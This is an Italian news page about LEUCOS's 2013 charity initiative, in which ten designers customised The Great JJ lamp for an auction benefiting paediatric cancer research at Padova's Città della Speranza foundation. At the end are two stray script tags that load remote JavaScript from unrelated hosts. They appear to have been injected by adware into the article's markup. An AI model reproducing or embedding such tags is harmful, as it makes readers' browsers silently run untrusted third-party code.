1. Home
  2. Notizie e Mercato
  3. Light your heart-Edition 2013

Light your heart-Edition 2013

Arredamento e Mobili di
Doniamo raggi di luce per la Fondazione “Città della Speranza” di Padova. Dieci The Great JJ by LEUCOS personalizzate da altrettante firme del design internazionale offerte per un’asta benefica a favore della ricerca sulle neoplasie infantili


Iniziativa Fondazione Città della Speranza n. 011/13-VE
Light Your Heart è un evento pensato e promosso da LEUCOS a favore della Città della Speranza, fondazione nata con il duplice scopo di sostenere la ricerca sulle neoplasie infantili e dotare l’Ospedale di Padova di un nuovo reparto di Oncoematologia Pediatrica.

Dieci designer di fama internazionale – Arik Levy, Chris Bangle, Flavio Manzoni, Karim Rashid, Jozeph Forakis, Massimo Iosa Ghini, Patrick Jouin, Roberto Paoli, Satoshi Umeno e Valerio Cometti – hanno personalizzato a tema libero THE GREAT JJ, versione king size della storica lampada creata da Jacob Jacobson nel 1937, capostipite di tutte le lampade da tavolo con braccio mobile orientabile ancora oggi vera e propria icona del design senza tempo.

L’estetica rigorosa, la pulizia delle linee e la scelta di un materiale attuale come l’alluminio sono le caratteristiche che ne hanno determinato il duraturo successo. A queste peculiarità i dieci designer hanno unito una personale interpretazione della primavera, dell’infanzia e della guarigione. A fare di ogni lampada un unico assoluto è anche il nome che i designer hanno voluto attribuirle a descrizione e sintesi di un processo creativo in cui si sono sentiti emotivamente coinvolti.

Durante il Salone del Mobile ed Euroluce (9 – 14 aprile) dieci prestigiose vetrine nei design district di Milano (Bikkembergs, Cesare Paciotti, Fabiana Filippi, Galvanotecnica Bugatti, Lovethesign, Pescheria da Claudio, Orizzonti, Ties-up, Valextra e Zilli) hanno ospitato gli esemplari unici affidati da LEUCOS alla creatività e sensibilità dei dieci designer. Questa prestigiosa e unica limited edition di THE GREAT JJ sarà oggetto di un’asta benefica che si terrà il prossimo autunno all’Istituto di Ricerca Pediatrica di Padova (IRP).

L’Istituto, inaugurato lo scorso giugno, è stato realizzato in soli tre anni su progetto dell’architetto Paolo Portoghesi ed è l’ultima opera della Fondazione Città della Speranza Onlus. Obiettivo dell’Istituto è promuovere la ricerca scientifica e la diagnostica avanzata nel campo delle patologie pediatriche, con particolare attenzione alle malattie oncologiche.

I designer:
Arik Levy
Chris Bangle
Flavio Manzoni
Karim Rashid
Jozeph Forakis
Massimo Iosa Ghini
Patrick Jouin
Roberto Paoli
Satoshi Umeno
Valerio Cometti


<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>